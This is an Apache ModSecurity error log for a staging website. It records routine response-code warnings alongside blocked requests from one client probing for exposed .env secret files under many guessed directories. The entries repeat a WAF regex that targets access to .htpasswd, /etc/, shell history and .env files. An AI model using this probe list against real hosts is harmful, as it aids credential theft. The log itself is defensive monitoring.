[Tue May 26 15:30:49.778461 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM9AAAcH4"]
[Tue May 26 15:30:49.782349 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM9gAAAHI"]
[Tue May 26 15:30:49.789015 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM-wAAADg"]
[Tue May 26 15:30:49.789866 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM-QAAcCE"]
[Tue May 26 15:30:49.799429 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM-gAAADo"]
[Tue May 26 15:30:49.826713 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM_AAAcHU"]
[Tue May 26 15:30:49.837931 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM_wAAAGg"]
[Tue May 26 15:30:49.883553 2026] [security2:error] [pid 715645:tid 715726] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/application/.env"] [unique_id "ahVvUXVGgMGh8k213RgNBQAALlA"]
[Tue May 26 15:30:49.885848 2026] [security2:error] [pid 715645:tid 715687] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/apps/.env"] [unique_id "ahVvUXVGgMGh8k213RgNBwAALik"]
[Tue May 26 15:30:49.903520 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNAgAAABU"]
[Tue May 26 15:30:49.929917 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNBAAALnE"]
[Tue May 26 15:30:49.929931 2026] [security2:error] [pid 715645:tid 715862] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMuQAAAFc"]
[Tue May 26 15:30:49.939348 2026] [security2:error] [pid 715645:tid 715693] [remote 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNCQAALi8"]
[Tue May 26 15:30:49.940387 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNCAAAAE8"]
[Tue May 26 15:30:50.292487 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNCgAALiU"]
[Tue May 26 15:30:50.303145 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNDQAALh4"]
[Tue May 26 15:30:50.305354 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNDwAALmw"]
[Tue May 26 15:30:50.318925 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNKQAAAG8"]
[Tue May 26 15:30:50.319334 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNEAAALhA"]
[Tue May 26 15:30:50.323017 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNGAAAAG0"]
[Tue May 26 15:30:50.323075 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNJAAAAEM"]
[Tue May 26 15:30:50.324995 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNEQAALhE"]
[Tue May 26 15:30:50.325838 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNFgAAADI"]
[Tue May 26 15:30:50.329113 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNEgAALls"]
[Tue May 26 15:30:50.329335 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNJQAALiM"]
[Tue May 26 15:30:50.338499 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNMAAAAEY"]
[Tue May 26 15:30:50.350882 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgNIAAAAHU"]
[Tue May 26 15:30:50.351102 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNKAAALhI"]
[Tue May 26 15:30:50.379632 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNLwAAAD0"]
[Tue May 26 15:30:50.382488 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNKgAALg4"]
[Tue May 26 15:30:50.485442 2026] [security2:error] [pid 715645:tid 715688] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back-api/.env"] [unique_id "ahVvUnVGgMGh8k213RgNUwAALSo"]
[Tue May 26 15:30:50.507956 2026] [security2:error] [pid 715645:tid 715651] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back-end/.env"] [unique_id "ahVvUnVGgMGh8k213RgNWQAALQU"]
[Tue May 26 15:30:50.518152 2026] [security2:error] [pid 715645:tid 715816] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNQgAAACk"]
[Tue May 26 15:30:50.519675 2026] [security2:error] [pid 715645:tid 715727] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back/.env"] [unique_id "ahVvUnVGgMGh8k213RgNWgAALVE"]
[Tue May 26 15:30:50.522690 2026] [security2:error] [pid 715645:tid 715704] [remote 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNSQAALTo"]
[Tue May 26 15:30:50.527284 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNQAAALRc"]
[Tue May 26 15:30:50.527491 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNUAAAAH4"]
[Tue May 26 15:30:50.527837 2026] [security2:error] [pid 715645:tid 715684] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend-api/.env"] [unique_id "ahVvUnVGgMGh8k213RgNWwAALSY"]
[Tue May 26 15:30:50.529849 2026] [security2:error] [pid 715645:tid 715742] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend/.env"] [unique_id "ahVvUnVGgMGh8k213RgNXAAALWA"]
[Tue May 26 15:30:50.530585 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNVwAAAEA"]
[Tue May 26 15:30:50.535384 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNWAAAAHI"]
[Tue May 26 15:30:50.540687 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNVgAAAD8"]
[Tue May 26 15:30:50.543217 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNUQAAAAQ"]
[Tue May 26 15:30:50.544467 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNVQAAAAw"]
[Tue May 26 15:30:50.546406 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNTgAAAFw"]
[Tue May 26 15:30:50.546617 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNVAAAAHw"]
[Tue May 26 15:30:50.681879 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNXQAAUCQ"]
[Tue May 26 15:30:50.688448 2026] [security2:error] [pid 715645:tid 715745] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backup/.env"] [unique_id "ahVvUnVGgMGh8k213RgNaAAAUGM"]
[Tue May 26 15:30:50.689914 2026] [security2:error] [pid 715645:tid 715719] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/be/.env"] [unique_id "ahVvUnVGgMGh8k213RgNaQAAUEk"]
[Tue May 26 15:30:50.691656 2026] [security2:error] [pid 715645:tid 715733] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/beta/.env"] [unique_id "ahVvUnVGgMGh8k213RgNagAAUFc"]
[Tue May 26 15:30:50.712969 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNXgAAUDA"]
[Tue May 26 15:30:50.716439 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNXwAAUCw"]
[Tue May 26 15:30:50.721109 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNYgAAUE4"]
[Tue May 26 15:30:50.722702 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNYQAAUEU"]
[Tue May 26 15:30:50.722828 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNZQAAUFQ"]
[Tue May 26 15:30:50.722982 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNYAAAUAc"]
[Tue May 26 15:30:50.725488 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNZwAAUHg"]
[Tue May 26 15:30:50.738405 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNZAAAUCc"]
[Tue May 26 15:30:50.742909 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNcAAAAFc"]
[Tue May 26 15:30:50.746167 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNZgAAUEg"]
[Tue May 26 15:30:50.747767 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNcQAAADY"]
[Tue May 26 15:30:50.749930 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNYwAAUGY"]
[Tue May 26 15:30:50.869579 2026] [security2:error] [pid 715645:tid 715650] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/client/.env"] [unique_id "ahVvUnVGgMGh8k213RgNhAAAHAQ"]
